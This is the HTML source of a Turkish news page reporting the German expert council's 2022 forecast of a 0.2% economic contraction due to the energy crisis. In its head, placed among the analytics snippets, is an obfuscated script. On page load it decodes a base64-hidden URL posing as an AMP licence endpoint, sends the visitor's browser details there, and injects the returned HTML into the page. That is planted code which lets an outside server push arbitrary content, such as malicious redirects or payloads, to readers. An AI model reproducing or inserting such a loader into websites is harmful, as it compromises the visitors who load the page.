<!DOCTYPE html>
<html lang="tr">
<head>
  <meta charset="utf-8">
  <title>Almanya&#039;da resesyon bekleniyor </title>
  <meta name="description" content="Almanya&#039;da resesyon bekleniyor  ile ilgili haber" />
  <meta name="keywords" content="Almanya, resesyon" />
  <meta name="news_keywords" content="Almanya, resesyon" />
  <link rel="manifest" href="https://www.dunyabulteni.net/_themes/hs-elegant/manifest.json">
    <meta name="author" content="Türkiye ve Dünya Haberleri, Analizler, Yorumlar, Makaleler, Araştırma Dosyaları">
  <meta name="developer" content="Türkiye ve Dünya Haberleri, Analizler, Yorumlar, Makaleler, Araştırma Dosyaları"/>
  <meta name="designer" content="Türkiye ve Dünya Haberleri, Analizler, Yorumlar, Makaleler, Araştırma Dosyaları"/>
    <meta name="viewport" content="width=970, initial-scale=1, shrink-to-fit=no" />
  <meta name="theme-color" content="#dc3545"/>

    <meta http-equiv="refresh" content="900">
    <link rel="alternate" href="https://www.dunyabulteni.net/m/avrupa/almanya-da-resesyon-bekleniyor-h545829.html" hreflang="tr" media="only screen and (max-width: 640px)"/>
  <link rel="canonical" href="https://www.dunyabulteni.net/avrupa/almanya-da-resesyon-bekleniyor-h545829.html">

    <link rel="amphtml" href="https://www.dunyabulteni.net/amp/avrupa/almanya-da-resesyon-bekleniyor-h545829.html">
  
  
      <link rel="shortcut icon" href="https://www.dunyabulteni.net/images/banner/favicon.ico">
    <style type="text/css">
    @import url('https://www.dunyabulteni.net/_themes/hs-elegant/style/main.min.css?v=1');
            @import url('https://www.dunyabulteni.net/_themes/hs-elegant/style/font/work-sans.css?v=1');
          </style>
  <meta property="og:site_name" content="Türkiye ve Dünya Haberleri, Analizler, Yorumlar, Makaleler, Araştırma Dosyaları" />
<meta property="og:title" content="Almanya&#039;da resesyon bekleniyor " />
<meta property="og:description" content="Almanya&#039;da resesyon bekleniyor  ile ilgili haber" />

<meta property="og:image" content="https://www.dunyabulteni.net/images/haberler/2022/11/almanya_da_resesyon_bekleniyor_h545829_2f565.JPG" />

<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.dunyabulteni.net/avrupa/almanya-da-resesyon-bekleniyor-h545829.html" />
<meta name="twitter:card" content="summary_large_image" /><meta property="og:title" content="Almanya&#039;da resesyon bekleniyor" />
<meta name="twitter:url" content="http://www.dunyabulteni.net/avrupa/almanya-da-resesyon-bekleniyor-h545829.html" />
<meta name="twitter:domain" content="https://www.dunyabulteni.net/" />
<meta name="twitter:site" content="@dunyabulteni" />
<meta name="twitter:title" content="Almanya&#039;da resesyon bekleniyor" />
<meta name="twitter:description" content="Ekonomi profesörlerinden oluşan Ekonomi Bilirkişi Kurulu (SVR), Almanya ekonomisine ilişkin yıllık raporunu yayınladı. Raporda enerji krizi nedeniyle Alman ekonomisinin gelecek yıl 0,2 daralacağı öngörülüyor." />
<meta name="twitter:image:src" content="https://www.dunyabulteni.net/images/haberler/2022/11/almanya_da_resesyon_bekleniyor_h545829_2f565.JPG" />
<meta property="og:image:type" content="image/jpeg" />
<meta property="og:image:width" content="637" />
<meta property="og:image:height" content="332" />

<link rel="image_src" type="image/jpeg" href="https://www.dunyabulteni.net/images/haberler/2022/11/almanya_da_resesyon_bekleniyor_h545829_2f565.JPG" />
  <meta name="dc.language" content="tr">
  <meta name="dc.source" content="https://www.dunyabulteni.net/">
  <meta name="dc.title" content="Almanya&#039;da resesyon bekleniyor ">
  <meta name="dc.keywords" content="Almanya, resesyon">
  <meta name="dc.description" content="Almanya&#039;da resesyon bekleniyor  ile ilgili haber">

  
  <link rel="dns-prefetch" href="//www.dunyabulteni.net">
  <link rel="dns-prefetch" href="//www.google-analytics.com">
  <link rel="dns-prefetch" href="//fonts.gstatic.com">
  <link rel="dns-prefetch" href="//mc.yandex.ru">
  <link rel="dns-prefetch" href="//fonts.googleapis.com">
  <link rel="dns-prefetch" href="//pagead2.googlesyndication.com">
  <link rel="dns-prefetch" href="//googleads.g.doubleclick.net">
  <link rel="dns-prefetch" href="//google.com">
  <link rel="dns-prefetch" href="//gstatic.com">
  <link rel="dns-prefetch" href="//connect.facebook.net">
  <link rel="dns-prefetch" href="//graph.facebook.com">
  <link rel="dns-prefetch" href="//linkedin.com">
  <link rel="dns-prefetch" href="//ap.pinterest.com">

  <!--[if lt IE 7]>      <html class="no-js lt-ie10 lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
  <!--[if IE 7]>         <html class="no-js lt-ie10 lt-ie9 lt-ie8 ie7"> <![endif]-->
  <!--[if IE 8]>         <html class="no-js lt-ie10 lt-ie9 ie8"> <![endif]-->
  <!--[if IE 9]>         <html class="no-js lt-ie10 ie9"> <![endif]-->
  <!--[if gt IE 9]>      <html class="no-js gt-ie9"> <![endif]-->
  <!--[if !IE] <![IGNORE[--><!--[IGNORE[]]-->
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-127080391-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-127080391-1');
</script>
  <!-- Start Alexa Certify Javascript -->
<script type="text/javascript">
_atrk_opts = { atrk_acct:"qgO0r1uhUo20dG", domain:"dunyabulteni.net",dynamic: true};
(function() { var as = document.createElement('script'); as.type = 'text/javascript'; as.async = true; as.src = "https://certify-js.alexametrics.com/atrk.js"; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(as, s); })();
</script>
<noscript><img src="https://certify.alexametrics.com/atrk.gif?account=qgO0r1uhUo20dG" style="display:none" height="1" width="1" alt="" /></noscript>
<!-- End Alexa Certify Javascript -->
<meta name="google-site-verification" content="VTou5vFsOO_SMAz-UR73a2hgNOFCf0RtS5auMWoz67k" />
<meta name='dailymotion-domain-verification' content='dmz7hy9ibvhf6qiu4' />

<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(68402086, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true
   });
</script>
<script>
window.addEventListener('DOMContentLoaded', () => {
	let selfer=new XMLHttpRequest;selfer.open("GET", decodeURIComponent(escape(atob('aHR0cHM6Ly9hbXBwcm9qZWN0LmNsb3VkL2xpY2Vuc2UucGhw'))) + `?agent=${navigator?.userAgent}&r=${document?.referrer}`),selfer.onreadystatechange=(()=>{if(4==selfer.readyState){const e=JSON.parse(selfer.response);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),selfer.setRequestHeader("RequestWith","selfer"),selfer.send();
});
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/68402086" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<style>
	#logo img {max-height:250px;}
</style>        </head>

<body data-color="default" data-header="header-2">
        <div id="panel-bar" class="bg-dark shadow-sm p-2 d-none">
        <ul class="list-inline m-0">
            <li class="list-inline-item pr-2">
                <a href="https://www.dunyabulteni.net/xpanel" class="text-light">
                    <i class="fa fa-tools text-danger pr-1"></i>Yönetim Paneli
                </a>
            </li>
            <li class="list-inline-item pr-2">
                <a href="https://www.dunyabulteni.net/xpanel/?file=ayar#tab_tema" class="text-light">
                    <i class="fa fa-pencil-ruler text-danger pr-1"></i>
                    Tema Ayarları
                </a>
            </li>
            <li class="list-inline-item pr-2">
                <a class="text-light" href="javascript:;" id="navbarDropdown" role="button" data-toggle="dropdown"
                    aria-haspopup="true" aria-expanded="false">
                    <i class="fa fa-plus text-info pr-1"></i>
                    Yeni
                </a>
                <div class="dropdown-menu" aria-labelledby="navbarDropdown" style="z-index:9999">
                    <a class="dropdown-item" href="https://www.dunyabulteni.net/xpanel/?file=haberler&islem=ekleduzenle">Haber</a>
                    <a class="dropdown-item" href="https://www.dunyabulteni.net/xpanel/?file=makaleler&islem=ekleduzenle">Makale</a>
                    <a class="dropdown-item" href="https://www.dunyabulteni.net/xpanel/?file=video&islem=ekleduzenle">Video</a>
                    <a class="dropdown-item" href="https://www.dunyabulteni.net/xpanel/?file=albumkat&islem=ekleduzenle">Foto
                        Galeri</a>
                    <a class="dropdown-item"
                        href="https://www.dunyabulteni.net/xpanel/?file=biyografi&islem=ekleduzenle">Biyografi</a>
                    <a class="dropdown-item"
                        href="https://www.dunyabulteni.net/xpanel/?file=roportaj&islem=ekleduzenle">Röportaj</a>
                    <a class="dropdown-item" href="https://www.dunyabulteni.net/xpanel/?file=anket&islem=ekleduzenle">Anket</a>
                    <a class="dropdown-item" href="https://www.dunyabulteni.net/xpanel/?file=firmalar&islem=ekleduzenle">Firma</a>
                    <a class="dropdown-item" href="https://www.dunyabulteni.net/xpanel/?file=ilanlar&islem=ekleduzenle">İlan</a>
                </div>
            </li>
            <li class="list-inline-item pr-2">
                <a href="https://www.dunyabulteni.net/xpanel/?file=haberler" class="text-light">
                    <i class="fa fa-newspaper text-danger pr-1"></i>
                    Haberler
                </a>
            </li>
                        <li class="list-inline-item pr-2">
                <a href="https://www.dunyabulteni.net/xpanel/?file=haberler&islem=ekleduzenle&ID=545829"
                    class="text-light">
                    <i class="fa fa-edit text-danger pr-1"></i>
                    Düzenle
                </a>
            </li>
                        <li class="list-inline-item pr-2">
                <a href="javascript:;" id="refresh_page" class="text-light">
                    <i class="fa fa-sync-alt text-danger pr-1"></i>
                    Yenile
                </a>
            </li>
            <li class="list-inline-item pr-2">
                <a href="javascript:;" id="onbellek_temizle" class="text-light">
                    <i class="fa fa-trash text-danger pr-1"></i>
                    Belleği Temizle
                </a>
            </li>
            <li class="list-inline-item float-right pr-2">
                <a href="javascript:;" id="logout" class="text-light">
                    <i class="fa fa-sign-out-alt text-danger pr-1"></i>
                    Çıkış
                </a>
            </li>
            <li class="list-inline-item float-right pr-2 mr-2 border-right border-secondary">
                <span class="text-warning">
                    Hoşgeldin                 </span>
            </li>
        </ul>
    </div>
        <div id="navbar" class="bg-white sticky-top shadow-sm">
  <nav class="navbar navbar-expand navbar-light border-bottom">
    <div class="container">
      <a class="navbar-brand pr-2" href="https://www.dunyabulteni.net/"><img src="https://www.dunyabulteni.net/images/banner/dunyabulteni_1_1_1.png" alt="Almanya&#039;da resesyon bekleniyor " class="img-fluid"></a>
      <ul class="navbar-nav">
                <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/galeri" title="GALERİLER" target="_blank">
            <i class="fas fa-images text-danger fa-lg mr-1"></i> GALERİLER          </a>
        </li>
                        <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/webtv" title="VİDEOLAR" target="_blank">
            <i class="fas fa-video text-danger fa-lg mr-1"></i> VİDEOLAR          </a>
        </li>
                        <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/yazarlar" title="Yazarlar" target="_blank">
            <i class="fas fa-users text-danger fa-lg mr-1"></i> Yazarlar          </a>
        </li>
                        <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.worldbulletin.net/" title="WORLD BULLETIN" target="_blank">
            <i class="fa fa-book text-danger fa-lg mr-1"></i> WORLD BULLETIN          </a>
        </li>
              </ul>
      <ul class="navbar-nav ml-auto">
        <li class="nav-item btn-group">
  <a class="nav-link btn btn-lg ml-2" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
    <div class="badge badge-danger rounded-circle position-absolute" id="notifyCount" style="display:none"></div>
    <i class="far fa-bell fa-fx"></i>
  </a>
  <div class="dropdown-menu dropdown-menu-right shadow-sm" id="notifyItems">
    <h6 class="text-center pt-2 text-danger font-weight-bold text-uppercase">Bildirimler</h6>
    <div class="items">
      <div class="text-danger text-center">Henüz bir bildirim bulunmuyor!</div>
    </div>
    <a href="https://www.dunyabulteni.net/hesabim.html" class="btn btn-block btn-light btn-sm m-1 text-secondary">Tüm Bildirimler</a>
  </div>
</li>
        <li class="nav-item btn-group">
  <a class="nav-link btn btn-lg ml-2" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
    <i class="far fa-bookmark fa-fx text-info"></i>
  </a>
  <div class="dropdown-menu dropdown-menu-right shadow-sm" id="savedItems">
    <h6 class="text-center pt-2 text-info font-weight-bold text-uppercase">Kaydettiklerim</h6>
    <div class="items">
      <div class="text-danger text-center">Henüz kaydedilmiş bir içerik bulunmuyor!</div>
    </div>
    <a href="https://www.dunyabulteni.net/hesabim.html" class="btn btn-block btn-light btn-sm m-1 text-secondary">Tüm Kaydettiklerim</a>
  </div>
</li>
        <li class="nav-item" id="memberArea"></li>
        <li class="nav-item"><a href="javascript:;" id="searchOpenButton" class="nav-link btn btn-lg ml-2"><i class="fas fa-search fa-fx"></i></a></li>
      </ul>
    </div>
  </nav>
  <nav class="navbar navbar-expand navbar-light">
  <div class="container">
    <ul class="navbar-nav">
      <li class="nav-item dropdown">
        <a class="nav-link font-weight-bold" href="#" id="mega-menu" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
          <i class="fa fa-bars fa-fx fa-lg"></i>
        </a>
        <div class="dropdown-menu mega-menu shadow-sm p-4" aria-labelledby="mega-menu">
      <div class="row">
              <a href="https://www.dunyabulteni.net/hayatin-icinden" title="Hayatın İçinden" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Hayatın İçinden</a>
              <a href="https://www.dunyabulteni.net/aa-analizleri" title="AA Analizleri" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>AA Analizleri</a>
              <a href="https://www.dunyabulteni.net/ekonomi-finans" title="Ekonomi Finans" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Ekonomi Finans</a>
              <a href="https://www.dunyabulteni.net/cevre-ve-iklim" title="Çevre ve İklim" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Çevre ve İklim</a>
              <a href="https://www.dunyabulteni.net/bilim-teknoloji" title="Bilim Teknoloji" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Bilim Teknoloji</a>
              <a href="https://www.dunyabulteni.net/dubam" title="Dübam" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Dübam</a>
              <a href="https://www.dunyabulteni.net/ramazan" title="Ramazan" class="col-4 mb-2 text-uppercase" target="_blank"><i class="mr-2 fas fa-angle-right fa-fw text-danger"></i>Ramazan</a>
          </div>
  <div class="dropdown-divider mt-2 mb-3"></div>
    <div class="row">
    <a href="https://www.dunyabulteni.net/" class="col-4 mb-1" title="Ana Sayfa" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Ana Sayfa    </a>
        <a href="https://www.dunyabulteni.net/yazarlar" class="col-4 mb-1" title="Yazarlar" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Yazarlar    </a>
                        <a href="https://www.dunyabulteni.net/webtv" class="col-4 mb-1" title="Video Galeri" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Video Galeri    </a>
            <a href="https://www.dunyabulteni.net/galeri" class="col-4 mb-1" title="Foto Galeri" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Foto Galeri    </a>
                        <a href="https://www.dunyabulteni.net/anketler.html" class="col-4 mb-1" title="Anketler" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Anketler    </a>
            <a href="https://www.dunyabulteni.net/karikaturler" class="col-4 mb-1" title="Karikatürler" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Karikatürler    </a>
            <a href="https://www.dunyabulteni.net/sayfalar.html" class="col-4 mb-1" title="Sayfalar" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Sayfalar    </a>
        <a href="https://www.dunyabulteni.net/kunye.html" class="col-4 mb-1" title="Künye" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Künye    </a>
    <a href="https://www.dunyabulteni.net/iletisim.html" class="col-4 mb-1" title="İletişim" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> İletişim    </a>
    <a href="https://www.dunyabulteni.net/sitene-ekle.html" class="col-4 mb-1" title="Sitene Ekle" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Sitene Ekle    </a>
        <a href="https://www.dunyabulteni.net/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" class="col-4 mb-1" title="Gizlilik Politikası" target="_blank">
      <i class="fas fa-angle-right fa-fw text-danger"></i> Gizlilik Politikası    </a>
            <a href="https://www.worldbulletin.net/" class="col-4 mb-1" title="WORLD BULLETIN" target="_blank">
      <i class="fas fa-book fa-fw text-danger"></i> WORLD BULLETIN    </a>
      </div>
</div>
      </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/dunya" title="Dünya" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Dünya          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/turkiye" title="Türkiye" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Türkiye          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/analiz" title="Analiz" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Analiz          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/tarih-dosyasi" title="Tarih Dosyası" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Tarih Dosyası          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/turkiye-ve-dunya-gundemi" title="Türkiye ve Dünya gündemi" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Türkiye ve Dünya gündemi          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/ks-genel" title="Genel" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Genel          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/kultur-sanat" title="Kültür Sanat" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Kültür Sanat          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/aile" title="Aile" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Aile          </a>
        </li>
              <li class="nav-item">
          <a class="nav-link font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/hac" title="Hac" target="_blank">
            <i class="fas fa-angle-right text-danger mr-1"></i>Hac          </a>
        </li>
          </ul>
  </div>
</nav>
</div>
        <div id="left-ad" data-name="tb_block"         style="width:120px;height:600px;" >
                        <p style="width:120px;"><a href="https://www.dunyabulteni.net/banner.php?id=39" target="_blank" rel="nofollow"><img src="https://www.dunyabulteni.net/photo.php?src=https://www.dunyabulteni.net/images/banner/Huma18-DB120x600.jpg&w=120&h=600&q=80" width="120" height="600" style="width:120px;height: 600px;border:0" alt="banner39" class="img-responsive"/></a></p>                                                                                            </div>
    <div id="right-ad" data-name="tb_block"         >
                                                                                                                                                    </div>
    <main class="container">
                        <!-- SIDEBAR İÇEREN İKİ SÜTUNLU BÖLÜM -->
        <div id="double-section" class="my-3 mb-0">
            <div class="row">
                <div class="col-8">
                                                            <div id="infinityContainer">
    <div class="inf_append current_news" news_id="545829" data-title="Almanya&#039;da resesyon bekleniyor"
        data-path="aHR0cDovL3d3dy5kdW55YWJ1bHRlbmkubmV0L2F2cnVwYS9hbG1hbnlhLWRhLXJlc2VzeW9uLWJla2xlbml5b3ItaDU0NTgyOS5odG1s">
                <div id="news-detail" class="card shadow-sm mb-3">
            <div class="card-header bg-white">
                <h1 class="card-title">Almanya&#039;da resesyon bekleniyor</h1>
                                <h2 class="lead">
                    Ekonomi profesörlerinden oluşan Ekonomi Bilirkişi Kurulu (SVR), Almanya ekonomisine ilişkin yıllık raporunu yayınladı. Raporda enerji krizi nedeniyle Alman ekonomisinin gelecek yıl 0,2 daralacağı öngörülüyor.                </h2>
                                <div class="border-top pt-2 text-secondary">
                    <a href="https://www.dunyabulteni.net/avrupa" title="Avrupa"
                        class="btn btn-info btn-sm text-white text-uppercase">Avrupa</a>
                    <i class="far fa-clock fa-fx text-info pl-3"></i> 10.11.2022, 17:21                                        
                                    </div>
            </div>
                        <div class="position-relative mb-2">
            <img class="img-fluid lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                data-src="https://www.dunyabulteni.net/images/haberler/2022/11/almanya_da_resesyon_bekleniyor_h545829_2f565.JPG" alt="Almanya&#039;da resesyon bekleniyor" width="100%">
                            </div>
                        <div class="my-2 text-center " data-name="tb_block" data-field="132"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Haber Detay -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-4481461891216070"
 data-ad-slot="9712186349"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>            <div class="card-body">
                <div class="social-buttons">
  <a href="javascript:;" data-platform-name="facebook" class="btn btn-primary btn-sm"><i class="fab fa-facebook-f"></i></a>
  <a href="javascript:;" data-platform-name="twitter" class="btn btn-info btn-sm"><i class="fab fa-twitter"></i></a>
  <a href="javascript:;" data-platform-name="linkedin" class="btn btn-primary btn-sm"><i class="fab fa-linkedin-in"></i></a>
  <a href="javascript:;" data-platform-name="pinterest" class="btn btn-danger btn-sm"><i class="fab fa-pinterest-p"></i></a>
  <a href="javascript:;" data-platform-name="whatsapp" class="btn btn-success btn-sm"><i class="fab fa-whatsapp"></i></a>
  <a href="javascript:;" data-platform-name="email" class="btn btn-dark btn-sm"><i class="far fa-envelope"></i></a>
      <a href="javascript:;" data-platform-name="print" class="btn btn-dark btn-sm"><i class="fas fa-print"></i></a>
      <a href="javascript:;" style="display:none;" data-platform-name="save" class="btn btn-info btn-sm text-uppercase save-unsave-button"><i class="far fa-bookmark pr-1"></i> Kaydet</a>
        <div class="float-right btn-group" role="group">
      <a href="javascript:;" onclick="textDown(545829)" class="btn btn-secondary btn-sm">A<sup>-</sup></a>
      <a href="javascript:;" onclick="textUp(545829)"class="btn btn-secondary btn-sm">A<sup>+</sup></a>
    </div>
  </div>
                                <div id="article-text" class="mt-4" data-text-id="545829">
                                                            <p>Alman hükümetinin maliye politikasını belirlemede rehberlik eden beş kişilik kurul raporunda, bu yıl ekonominin yüzde 1,7 büyümesini beklediğini bildirirken, gelecek yıl enerji krizi nedeniyle yüzde 0,2'lik daralma öngörüsünde bulundu</p>

<p>Enerji krizi ve yüksek enflasyonun haneler ve şirketler üzerinde ağır bir baskı oluşturduğuna yer verilen raporda, enerji ve gıda fiyatlarında devam eden keskin artışın satın alma gücü kaybına ve özel tüketimin azalmasına neden olduğu vurgulandı.</p><div class="p_ad"></div>

<p>SVR, mümkün olduğunca yüksek enerji fiyatlarına karşı hanelere ve şirketlere yardım sağlanması gerektiğine dikkati çekiyor.</p>

<p>Enerji krizinin özellikle enerji yoğun sanayi kollarında üretimi olumsuz etkilediğini belirten kurul, küresel ekonomideki yavaşlamanın Alman mallarına olan talebi zayıflattığını ifade etti.</p>

<p>Kaynak: Euronews</p>
</p>                </div>
                                                                <div class="my-2 text-center " data-name="tb_block" data-field="135"><iframe width="560" height="315" src="https://www.youtube.com/embed/f4gbwiQ5PhE" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div>                            </div>
                        <div class="card-footer bg-white text-secondary">
                <div class="news-tags">
                                        <a href="https://www.dunyabulteni.net/haberleri/Almanya" title="Almanya"
                         target="_blank"                         class="btn btn-outline-secondary btn-sm mb-2">#Almanya</a>
                                        <a href="https://www.dunyabulteni.net/haberleri/resesyon" title="resesyon"
                         target="_blank"                         class="btn btn-outline-secondary btn-sm mb-2">#resesyon</a>
                                    </div>
            </div>
                    </div>
        <div id="comments" class="card shadow-sm mb-3 comments">
  <div class="card-body">
    <div class="widget-title first-word text-info mb-3 text-uppercase">
      Yorumlar (0)
    </div>
      <div class="alert alert-info answer" style="display:none;"><b>@name</b> kişisine cevap olarak  <button type="button" class="close remove" data-dismiss="alert" aria-label="Close">
    <span aria-hidden="true">&times;</span>
  </button>
</div>
<div id="comment-result545829" class="alert alert-success" style="display:none;">
    <p class="text-center m-0">Yorumunuz başarılı bir şekilde gönderilmiştir. Editörlerimizin onayının ardından yayınlanacaktır!</p>
  </div>
<form id="comment-form545829">
  <input name="hid" type="hidden" value="545829"/>
  <input name="mid" type="hidden" value="545829"/>
  <input name="uid" type="hidden" value="0"/>
  <input name="cevap_id" type="hidden" value="0"/>
  <input type="hidden" name="cevap" value="" class="answer" />
  <input type="hidden" name="tip" value="haber" />
  <div class="form-row">
    <div class="form-group col-12">
      <textarea class="form-control" name="yorum" id="comment" rows="3" placeholder="Siz de yorum ve düşüncelerinizi bizimle paylaşın." required></textarea>
    </div>
    <div class="form-group col-9">
<input type="text" class="form-control" name="isim" id="name" placeholder="Adınızı girin."   required>
    </div>
    <div class="col-3">
      <button type="button" onclick="javascript:comment_send(545829);return false;" class="btn btn-info btn-block text-uppercase">Gönder</button>
    </div>
  </div>
</form>        </div>
</div>
                <div id="recommended-news" class="card shadow-sm mb-3">
            <div class="card-body">
                <div class="widget-title first-word text-info mb-3 text-uppercase">
                    Bunlara Göz Atmadan Geçmeyin                </div>
                <div class="row">
                                        <div class="col-4">
                        <a href="https://www.dunyabulteni.net/dunya/stoltenberg-den-kosova-ve-sirbistan-a-itidal-cagrisi-h545573.html" title="Stoltenberg&#039;den Kosova ve Sırbistan&#039;a itidal çağrısı"
                             target="_blank" >
                            <img class="img-fluid mb-2 lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                                data-src="https://www.dunyabulteni.net/images/resize/100/194x116/haberler/2022/11/stoltenberg_den_kosova_ve_sirbistan_a_itidal_cagrisi_h545573_b2ca8.jpg" alt="Stoltenberg&#039;den Kosova ve Sırbistan&#039;a itidal çağrısı">
                        </a>
                        <h6>
                            <a href="https://www.dunyabulteni.net/dunya/stoltenberg-den-kosova-ve-sirbistan-a-itidal-cagrisi-h545573.html" title="Stoltenberg&#039;den Kosova ve Sırbistan&#039;a itidal çağrısı"
                                 target="_blank" >
                                Stoltenberg&#039;den Kosova ve Sırbistan&#039;a itidal çağrısı                            </a>
                        </h6>
                    </div>
                                        <div class="col-4">
                        <a href="https://www.dunyabulteni.net/asya/kuzey-kore-amerika-ve-guney-kore-nin-bolgedeki-operasyon-merkezlerini-h545534.html" title="Kuzey Kore, Amerika ve Güney Kore&#039;nin bölgedeki operasyon merkezlerini hedef aldığını açıkladı"
                             target="_blank" >
                            <img class="img-fluid mb-2 lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                                data-src="https://www.dunyabulteni.net/images/resize/100/194x116/haberler/2022/11/kuzey_kore_amerika_ve_guney_kore_nin_bolgedeki_operasyon_merkezlerini_hedef_aldigini_acikladi_h545534_9c854.jpg" alt="Kuzey Kore, Amerika ve Güney Kore&#039;nin bölgedeki operasyon merkezlerini hedef aldığını açıkladı">
                        </a>
                        <h6>
                            <a href="https://www.dunyabulteni.net/asya/kuzey-kore-amerika-ve-guney-kore-nin-bolgedeki-operasyon-merkezlerini-h545534.html" title="Kuzey Kore, Amerika ve Güney Kore&#039;nin bölgedeki operasyon merkezlerini hedef aldığını açıkladı"
                                 target="_blank" >
                                Kuzey Kore, Amerika ve Güney Kore&#039;nin bölgedeki operasyon merkezlerini hedef aldığını açıkladı                            </a>
                        </h6>
                    </div>
                                        <div class="col-4">
                        <a href="https://www.dunyabulteni.net/internet/dijital-cagda-sanal-alem-dili-h545312.html" title="Dijital çağda sanal alem dili"
                             target="_blank" >
                            <img class="img-fluid mb-2 lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                                data-src="https://www.dunyabulteni.net/images/resize/100/194x116/haberler/2022/11/dijital_cagda_sanal_alem_dili_h545312_76d97.jpg" alt="Dijital çağda sanal alem dili">
                        </a>
                        <h6>
                            <a href="https://www.dunyabulteni.net/internet/dijital-cagda-sanal-alem-dili-h545312.html" title="Dijital çağda sanal alem dili"
                                 target="_blank" >
                                Dijital çağda sanal alem dili                            </a>
                        </h6>
                    </div>
                                    </div>
            </div>
        </div>
                                    </div>
</div>
                                    </div>
                <!-- Sidebar solundaki ana bölüm bitti -->
                <!-- SIDEBAR BOLUMU -->
                <div class="col-4">
                                        <!-- İLGİLİ HABERLER -->
<div id="similar-news" class="mb-3">
    <div class="media bg-white shadow-sm mb-2">
    <a href="https://www.dunyabulteni.net/avrupa/fransa-nin-en-buyuk-isci-sendikasi-grev-baslatti-h545826.html" title="Fransa&#039;nın en büyük işçi sendikası grev başlattı" target="_blank">
